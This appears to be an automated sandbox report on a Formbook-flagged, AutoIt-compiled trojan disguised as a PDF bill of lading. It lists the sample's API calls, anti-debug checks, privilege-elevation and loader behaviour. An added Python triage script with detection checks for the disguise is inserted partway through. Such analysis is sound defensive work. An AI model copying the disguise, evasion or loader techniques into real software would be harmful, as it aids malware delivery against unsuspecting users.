                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:8
                                                                                                                    Start time:23:07:10
                                                                                                                    Start date:23/10/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3%
                                                                                                                      Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                      Signature Coverage:3.9%
                                                                                                                      Total number of Nodes:1411
                                                                                                                      Total number of Limit Nodes:33
                                                                                                                      execution_graph 83116 40f110 RegOpenKeyExW 83117 40f13c RegQueryValueExW RegCloseKey 83116->83117 83118 40f15f 83116->83118 83117->83118 83119 429212 83124 410b90 83119->83124 83125 410b9a __write_nolock 83124->83125 83144 41171a 83125->83144 83129 410c66 _wcsncat 83159 413e3c 83129->83159 83132 41171a 75 API calls 83133 410ca3 _wcscpy 83132->83133 83134 410cd1 RegOpenKeyExW 83133->83134 83135 429bc3 RegQueryValueExW 83134->83135 83136 410cf7 83134->83136 83137 429cd9 RegCloseKey 83135->83137 83139 429bf2 _wcscat _wcslen _wcsncpy 83135->83139 83141 411421 83136->83141 83138 41171a 75 API calls 83138->83139 83139->83138 83140 429cd8 83139->83140 83140->83137 83234 4113e5 83141->83234 83143 41142e 83146 411724 83144->83146 83147 410c31 GetModuleFileNameW 83146->83147 83149 411740 std::bad_alloc::bad_alloc 83146->83149 83162 4138ba 83146->83162 83180 411afc 6 API calls __decode_pointer 83146->83180 83156 413db0 83147->83156 83153 411421 __cinit 74 API calls 83149->83153 83155 411766 83149->83155 83151 411770 83182 41805b RaiseException 83151->83182 83153->83155 83154 41177e 83181 4116fd 67 API calls std::exception::exception 83155->83181 83192 413b95 83156->83192 83222 41abec 83159->83222 83163 41396d 83162->83163 83172 4138cc 83162->83172 83190 411afc 6 API calls __decode_pointer 83163->83190 83165 413973 83191 417f23 67 API calls __getptd_noexit 83165->83191 83170 413929 RtlAllocateHeap 83170->83172 83171 4138dd 83171->83172 83183 418252 67 API calls 2 library calls 83171->83183 83184 4180a7 67 API calls 7 library calls 83171->83184 83185 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83171->83185 83172->83170 83172->83171 83174 413959 83172->83174 83177 41395e 83172->83177 83179 413965 83172->83179 83186 41386b 67 API calls 4 library calls 83172->83186 83187 411afc 6 API calls __decode_pointer 83172->83187 83188 417f23 67 
API calls __getptd_noexit 83174->83188 83189 417f23 67 API calls __getptd_noexit 83177->83189 83179->83146 83180->83146 83181->83151 83182->83154 83183->83171 83184->83171 83186->83172 83187->83172 83188->83177 83189->83179 83190->83165 83191->83179 83193 413c2f 83192->83193 83198 413bae 83192->83198 83194 413d60 83193->83194 83195 413d7b 83193->83195 83218 417f23 67 API calls __getptd_noexit 83194->83218 83220 417f23 67 API calls __getptd_noexit 83195->83220 83198->83193 83210 413c1d 83198->83210 83214 41ab19 67 API calls _wcsftime_l_stat 83198->83214 83199 413d65 83204 413cfb 83199->83204 83219 417ebb 6 API calls 2 library calls 83199->83219 83202 413d03 83202->83193 83202->83204 83206 413d8e 83202->83206 83203 413cb9 83203->83193 83205 413cd6 83203->83205 83216 41ab19 67 API calls _wcsftime_l_stat 83203->83216 83204->83129 83205->83193 83205->83204 83209 413cef 83205->83209 83221 41ab19 67 API calls _wcsftime_l_stat 83206->83221 83217 41ab19 67 API calls _wcsftime_l_stat 83209->83217 83210->83193 83213 413c9b 83210->83213 83215 41ab19 67 API calls _wcsftime_l_stat 83210->83215 83213->83202 83213->83203 83214->83210 83215->83213 83216->83205 83217->83204 83218->83199 83220->83199 83221->83204 83223 41ac02 83222->83223 83224 41abfd 83222->83224 83231 417f23 67 API calls __getptd_noexit 83223->83231 83224->83223 83227 41ac22 83224->83227 83229 410c99 83227->83229 83233 417f23 67 API calls __getptd_noexit 83227->83233 83229->83132 83230 41ac07 83232 417ebb 6 API calls 2 library calls 83230->83232 83231->83230 83233->83230 83235 4113f1 __msize 83234->83235 83242 41181b 83235->83242 83241 411412 __msize 83241->83143 83268 418407 83242->83268 83244 4113f6 83245 4112fa 83244->83245 83333 4169e9 TlsGetValue 83245->83333 83248 4169e9 __decode_pointer 6 API calls 83249 41131e 83248->83249 83250 4113a1 83249->83250 83343 4170e7 68 API calls 4 library calls 83249->83343 83265 41141b 83250->83265 83252 41133c 83253 411388 83252->83253 83256 411357 83252->83256 83257 411366 
[Execution graph: the rendered call graph for this sample is not reproduced here; what the page carried was its underlying node/edge list. In that list each node is a graph id, a code address and a label naming the Windows API or CRT routine reached at that address, and each a->b token is a control-flow edge between two node ids. The labels in this part of the graph record the following API calls: memory and heap (HeapCreate, HeapAlloc, RtlFreeHeap, VirtualAlloc, VirtualFree, VirtualProtect); file I/O (CreateFileW, ReadFile, SetFilePointer, SetFilePointerEx, CloseHandle, GetFullPathNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetOpenFileNameW); module and import resolution (LoadLibraryA, LoadLibraryW, GetModuleHandleW, GetModuleFileNameW, GetProcAddress, FreeLibrary, EnumResourceNamesW, LoadImageW) plus GetPEB, the graph's marker for code that reads the Process Environment Block directly; anti-debug and termination (IsDebuggerPresent, MessageBoxA, GetCurrentProcess, TerminateProcess, ExitProcess); process and shell (GetCommandLineW, GetEnvironmentStringsW, GetStartupInfoA, GetStdHandle, GetFileType, SetHandleCount, ShellExecuteW, GetForegroundWindow, Shell_NotifyIconW, SystemParametersInfoW, SHGetMalloc, RegisterClassExW, CreateWindowExW, ShowWindow, GetSysColorBrush, LoadCursorW, LoadIconW, DestroyIcon); and runtime support (TlsAlloc, TlsGetValue, TlsSetValue, GetCurrentThreadId, Sleep, GetLastError, GetSystemTimeAsFileTime, WideCharToMultiByte, MultiByteToWideChar, VariantClear, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection and the CRT encode/decode-pointer, lock, malloc and startup helpers).]
84611->84494 84612->84512 84613->84495 84614->84504 84616->84505 84617->84504 84618->84514 84619->84513 84620->84512 84622 416fb6 __malloc_crt 67 API calls 84621->84622 84623 423615 84622->84623 84623->84523 84624->84521 84629 414cef GetSystemTimeAsFileTime __aulldiv 84626->84629 84628 4431ef 84628->84131 84629->84628 84630->84138 84632->84144 84638 4523e1 _wcscpy 84633->84638 84634 4151b0 81 API calls __fread_nolock 84634->84638 84635 44afdc GetSystemTimeAsFileTime 84635->84638 84636 452553 84636->84061 84636->84062 84637 41557c 105 API calls _fseek 84637->84638 84638->84634 84638->84635 84638->84636 84638->84637 84640 44b1b4 84639->84640 84641 44b1a6 84639->84641 84643 44b1ca 84640->84643 84644 414e06 138 API calls 84640->84644 84645 44b1c2 84640->84645 84642 414e06 138 API calls 84641->84642 84642->84640 84674 4352d1 81 API calls 2 library calls 84643->84674 84647 44b2c1 84644->84647 84645->84089 84647->84643 84650 44b2cf 84647->84650 84648 44b20d 84649 44b23b 84648->84649 84653 44b211 84648->84653 84675 43526e 84649->84675 84651 44b2dc 84650->84651 84654 414e94 __fcloseall 106 API calls 84650->84654 84651->84089 84652 44b21e 84657 44b22e 84652->84657 84661 414e94 __fcloseall 106 API calls 84652->84661 84653->84652 84656 414e94 __fcloseall 106 API calls 84653->84656 84654->84651 84656->84652 84657->84089 84658 44b242 84659 44b270 84658->84659 84660 44b248 84658->84660 84685 44b0af 111 API calls 84659->84685 84662 44b255 84660->84662 84664 414e94 __fcloseall 106 API calls 84660->84664 84661->84657 84665 44b265 84662->84665 84667 414e94 __fcloseall 106 API calls 84662->84667 84664->84662 84665->84089 84666 44b276 84686 43522c 67 API calls ___crtsetenv 84666->84686 84667->84665 84669 44b27c 84670 44b289 84669->84670 84672 414e94 __fcloseall 106 API calls 84669->84672 84671 44b299 84670->84671 84673 414e94 __fcloseall 106 API calls 84670->84673 84671->84089 84672->84670 84673->84671 84674->84648 84676 4138ba _malloc 67 API calls 84675->84676 84677 43527d 
84676->84677 84678 4138ba _malloc 67 API calls 84677->84678 84679 43528d 84678->84679 84680 4138ba _malloc 67 API calls 84679->84680 84681 43529d 84680->84681 84684 4352bc 84681->84684 84687 43522c 67 API calls ___crtsetenv 84681->84687 84683 4352c8 84683->84658 84684->84658 84685->84666 84686->84669 84687->84683 84688->83978 84689->83980 84690->83994 84691->83994 84692->83994 84693->83997 84694->83994 84695->83994 84696->84002 84697->84011 84699->84013 84700->83902 84702 410148 SHGetDesktopFolder 84701->84702 84705 4101a3 _wcscpy 84701->84705 84703 41015a _wcscpy 84702->84703 84702->84705 84704 41018a SHGetPathFromIDListW 84703->84704 84703->84705 84704->84705 84705->83906 84706->83908 84708 40f5e0 152 API calls 84707->84708 84709 40f417 84708->84709 84710 42ca37 84709->84710 84711 40f42c 84709->84711 84712 42ca1f 84709->84712 84713 452574 140 API calls 84710->84713 84745 4037e0 139 API calls 7 library calls 84711->84745 84746 43717f 110 API calls _printf 84712->84746 84716 42ca50 84713->84716 84719 42ca76 84716->84719 84720 42ca54 84716->84720 84717 40f446 84717->83905 84718 42ca2d 84718->84710 84721 41171a 75 API calls 84719->84721 84722 434fe1 106 API calls 84720->84722 84735 42cacc ctype 84721->84735 84723 42ca5e 84722->84723 84747 43717f 110 API calls _printf 84723->84747 84725 42ca6c 84725->84719 84726 42ccc3 84727 413a88 ___crtsetenv 67 API calls 84726->84727 84728 42cccd 84727->84728 84729 434fe1 106 API calls 84728->84729 84730 42ccda 84729->84730 84734 401b70 75 API calls 84734->84735 84735->84726 84735->84734 84738 402cc0 75 API calls 2 library calls 84735->84738 84739 4026a0 84735->84739 84748 445051 75 API calls _realloc 84735->84748 84749 44c80c 87 API calls 3 library calls 84735->84749 84750 44b408 75 API calls 84735->84750 84738->84735 84740 40276b 84739->84740 84741 4026af 84739->84741 84740->84735 84741->84740 84742 41171a 75 API calls 84741->84742 84743 4026ee ctype 84741->84743 84742->84743 84743->84740 84744 41171a 75 API calls 84743->84744 
84744->84743 84745->84717 84746->84718 84747->84725 84748->84735 84749->84735 84750->84735 84751->83915 84752->83916 84754 401bfb 84753->84754 84774 401cde 84753->84774 84776 4013a0 84754->84776 84757 42a9a0 LoadStringW 84760 42a9bb 84757->84760 84758 401c18 84759 4021e0 75 API calls 84758->84759 84761 401c2d 84759->84761 84782 40df50 75 API calls 84760->84782 84763 401c3a 84761->84763 84764 42a9cd 84761->84764 84763->84760 84765 401c44 84763->84765 84783 40d3b0 75 API calls 2 library calls 84764->84783 84781 40d3b0 75 API calls 2 library calls 84765->84781 84767 42a9dc 84769 42a9f0 84767->84769 84771 401c53 _memset _wcscpy _wcsncpy 84767->84771 84784 40d3b0 75 API calls 2 library calls 84769->84784 84772 401cc2 Shell_NotifyIconW 84771->84772 84772->84774 84773 42a9fe 84774->83927 84775->83922 84777 41171a 75 API calls 84776->84777 84778 4013c4 84777->84778 84779 401380 75 API calls 84778->84779 84780 4013d3 84779->84780 84780->84757 84780->84758 84781->84771 84782->84771 84783->84767 84784->84773 84785 444343 84788 444326 84785->84788 84787 44434e WriteFile 84789 444340 84788->84789 84790 4442c7 84788->84790 84789->84787 84795 40e190 SetFilePointerEx 84790->84795 84792 4442e0 SetFilePointerEx 84796 40e190 SetFilePointerEx 84792->84796 84794 4442ff 84794->84787 84795->84792 84796->84794 84797 46d22f 84800 46d098 84797->84800 84799 46d241 84801 46d0b5 84800->84801 84802 46d115 84801->84802 84803 46d0b9 84801->84803 84851 45c216 78 API calls 84802->84851 84804 41171a 75 API calls 84803->84804 84806 46d0c0 84804->84806 84808 46d0cc 84806->84808 84848 40d940 76 API calls 84806->84848 84807 46d126 84809 46d0f8 84807->84809 84815 46d142 84807->84815 84812 453063 111 API calls 84808->84812 84810 4092c0 VariantClear 84809->84810 84813 46d0fd 84810->84813 84814 46d0dd 84812->84814 84813->84799 84849 40dfa0 83 API calls 84814->84849 84816 46d1c8 84815->84816 84818 46d158 84815->84818 84856 4676a3 78 API calls 84816->84856 84821 453063 111 API calls 84818->84821 84819 46d0ea 
84819->84815 84822 46d0ee 84819->84822 84831 46d15e 84821->84831 84822->84809 84850 44ade5 CloseHandle ctype 84822->84850 84823 46d1ce 84857 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84823->84857 84824 46d18d 84852 467fce 82 API calls 84824->84852 84826 46d196 84829 4013a0 75 API calls 84826->84829 84832 46d1a2 84829->84832 84830 46d1e7 84834 4092c0 VariantClear 84830->84834 84842 46d194 84830->84842 84831->84824 84831->84826 84853 40df50 75 API calls 84832->84853 84834->84842 84835 46d1ac 84854 40d3b0 75 API calls 2 library calls 84835->84854 84837 46d224 84837->84799 84838 46d1b8 84855 467fce 82 API calls 84838->84855 84841 46d216 84858 44ade5 CloseHandle ctype 84841->84858 84842->84837 84844 40d900 84842->84844 84845 40d917 84844->84845 84846 40d909 84844->84846 84845->84846 84847 40d91c CloseHandle 84845->84847 84846->84841 84847->84841 84848->84808 84849->84819 84850->84809 84851->84807 84852->84842 84853->84835 84854->84838 84855->84842 84856->84823 84857->84830 84858->84837 84859 42919b 84864 40ef10 84859->84864 84862 411421 __cinit 74 API calls 84863 4291aa 84862->84863 84865 41171a 75 API calls 84864->84865 84866 40ef17 84865->84866 84867 42ad48 84866->84867 84872 40ef40 74 API calls __cinit 84866->84872 84869 40ef2a 84873 40e470 84869->84873 84872->84869 84874 40c060 75 API calls 84873->84874 84875 40e483 GetVersionExW 84874->84875 84876 4021e0 75 API calls 84875->84876 84877 40e4bb 84876->84877 84899 40e600 84877->84899 84883 42accc 84885 42ad28 GetSystemInfo 84883->84885 84888 42ad38 GetSystemInfo 84885->84888 84886 40e557 GetCurrentProcess 84919 40ee30 LoadLibraryA GetProcAddress 84886->84919 84887 40e56c 84887->84888 84912 40eee0 84887->84912 84892 40e5c9 84916 40eea0 84892->84916 84895 40e5e0 84897 40e5f1 FreeLibrary 84895->84897 84898 40e5f4 84895->84898 84896 40e5dd FreeLibrary 84896->84895 84897->84898 84898->84862 84900 40e60b 84899->84900 84901 40c740 75 API calls 84900->84901 84902 40e4c2 84901->84902 84903 40e620 84902->84903 84904 
40e62a 84903->84904 84905 42ac93 84904->84905 84906 40c740 75 API calls 84904->84906 84907 40e4ce 84906->84907 84907->84883 84908 40ee70 84907->84908 84909 40e551 84908->84909 84910 40ee76 LoadLibraryA 84908->84910 84909->84886 84909->84887 84910->84909 84911 40ee87 GetProcAddress 84910->84911 84911->84909 84913 40e5bf 84912->84913 84914 40eee6 LoadLibraryA 84912->84914 84913->84885 84913->84892 84914->84913 84915 40eef7 GetProcAddress 84914->84915 84915->84913 84920 40eec0 LoadLibraryA GetProcAddress 84916->84920 84918 40e5d3 GetNativeSystemInfo 84918->84895 84918->84896 84919->84887 84920->84918 84921 40227b8 84922 4020408 GetPEB 84921->84922 84923 4022898 84922->84923 84935 40226a8 84923->84935 84925 40228c1 CreateFileW 84927 4022910 84925->84927 84928 4022915 84925->84928 84928->84927 84929 402292c VirtualAlloc 84928->84929 84929->84927 84930 402294a ReadFile 84929->84930 84930->84927 84931 4022965 84930->84931 84932 40216a8 13 API calls 84931->84932 84933 4022998 84932->84933 84934 40229bb ExitProcess 84933->84934 84934->84927 84936 40226b1 Sleep 84935->84936 84937 40226bf 84936->84937 84938 40116e 84939 401119 DefWindowProcW 84938->84939

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
  • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
• IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
• SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000004), ref: 0040D7D6
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
• SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000004), ref: 00431B0E
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000004), ref: 00431B3F
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
• ShellExecuteW.SHELL32(00000000), ref: 00431B92
  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
  • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
  • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
• String ID: @GH$@GH$C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
• API String ID: 2493088469-2772579827
• Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
• Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
• Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
• Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
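The APIs listed for this function (GetCurrentDirectoryW, IsDebuggerPresent, the MessageBoxA with the AutoIt marker text, and ShellExecuteW with the "runas" verb) are the AutoIt3 stub's normal startup path, so the marker alone does not make a file malicious; the signal here is the combination with a decoy double extension on an AutoIt-compiled sample. As an added example that is not part of this Joe Sandbox report or of AutoIt, the Python below turns those observations into a static triage check over a filename and raw file bytes. The decoy/executable extension sets, the score weights and the constructed sample bytes are this example's own assumptions; the byte search only works on unpacked files, where the import name table and strings are stored in clear.

```python
"""Static triage for the indicators visible in the function block above.

Added example, not code from the Joe Sandbox report or from AutoIt: it
checks a sample's filename for a decoy double extension and scans its raw
bytes for the AutoIt3 stub marker, the "runas" verb passed to ShellExecuteW,
and a few import names. Plain substring search is deliberately cheap and
only works when the import table and strings are not packed.
"""
from dataclasses import dataclass

# Message shown by the AutoIt3 stub (MessageBoxA at 0x00431AAB above). Every
# AutoIt3-compiled executable carries it, so on its own it classifies the
# file as AutoIt-compiled; benign AutoIt tools match too.
AUTOIT_MARKER = (b"This is a compiled AutoIt script. AV researchers please "
                 b"email avsupport@autoitscript.com for support.")

# Import names seen in the same block. They are stored as ASCII in the PE
# import name table, so a byte search finds them in an unpacked file.
WATCHED_IMPORTS = (b"IsDebuggerPresent", b"ShellExecuteW", b"GetForegroundWindow")

# ShellExecuteW takes wide strings, so "runas" is stored as UTF-16LE.
RUNAS_UTF16 = "runas".encode("utf-16-le")

# Document-like extensions that should never sit in front of an executable
# one. Both sets are this example's assumption, not a reference list.
DECOY_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
EXECUTABLE_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}


@dataclass
class TriageResult:
    double_extension: bool
    autoit_compiled: bool
    runas_verb: bool
    watched_imports: tuple

    def score(self) -> int:
        """Ordinal score; the weights are this example's own assumption."""
        return (3 * self.double_extension + 2 * self.autoit_compiled
                + self.runas_verb + len(self.watched_imports))


def has_double_extension(filename: str) -> bool:
    """True for names like 'Bill Of Lading_MEDUVB935991.pdf.exe' (case-insensitive)."""
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    _, decoy, real = parts
    return decoy in DECOY_EXTENSIONS and real in EXECUTABLE_EXTENSIONS


def find_watched_imports(data: bytes) -> tuple:
    """Return the watched import names present as ASCII in the file."""
    return tuple(name.decode() for name in WATCHED_IMPORTS if name in data)


def triage(filename: str, data: bytes) -> TriageResult:
    """Combine the filename check with the byte-level string checks."""
    return TriageResult(
        double_extension=has_double_extension(filename),
        autoit_compiled=AUTOIT_MARKER in data,
        runas_verb=RUNAS_UTF16 in data,
        watched_imports=find_watched_imports(data),
    )


# Constructed stand-in for a sample: an MZ signature, filler, and the strings
# the report says the binary contains. These are not the real file's bytes.
SAMPLE_BYTES = (b"MZ" + b"\x00" * 62
                + b"IsDebuggerPresent\x00ShellExecuteW\x00GetForegroundWindow\x00"
                + AUTOIT_MARKER + b"\x00"
                + RUNAS_UTF16 + b"\x00\x00")
SAMPLE_NAME = "Bill Of Lading_MEDUVB935991.pdf.exe"

if __name__ == "__main__":
    result = triage(SAMPLE_NAME, SAMPLE_BYTES)
    print(result, "score:", result.score())
```

Run it against a real file with `triage(path.name, path.read_bytes())`; a hit on the marker plus a decoy extension is worth a closer look, while the marker alone is only a classification of the wrapper.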

Control-flow Graph

[Control-flow graph omitted: basic blocks 40e470-40e5ff and 42ac93-42ad3d, coloured executed/not executed in the original report. The graph's API calls are GetVersionExW, GetCurrentProcess, GetSystemInfo (two sites), GetNativeSystemInfo and FreeLibrary (two sites), with helper calls to 40c060, 4021e0, 40e600, 40e620, 40ee70, 40ee30, 40eee0 and 40eea0.]
APIs
• GetVersionExW.KERNEL32 ref: 0040E495
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
• GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
• FreeLibrary.KERNEL32(?), ref: 0040E5DE
• FreeLibrary.KERNEL32(?), ref: 0040E5F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
• String ID: pMH
• API String ID: 2923339712-2522892712
• Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
• Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
• Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
• Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: IsThemeActive$uxtheme.dll
                                                                                                                      • API String ID: 2574300362-3542929980
                                                                                                                      • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                      • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                      • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                      • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                      • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                        • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                      • _wcscat.LIBCMT ref: 00429C43
                                                                                                                      • _wcslen.LIBCMT ref: 00429C55
                                                                                                                      • _wcslen.LIBCMT ref: 00429C66
                                                                                                                      • _wcscat.LIBCMT ref: 00429C80
                                                                                                                      • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
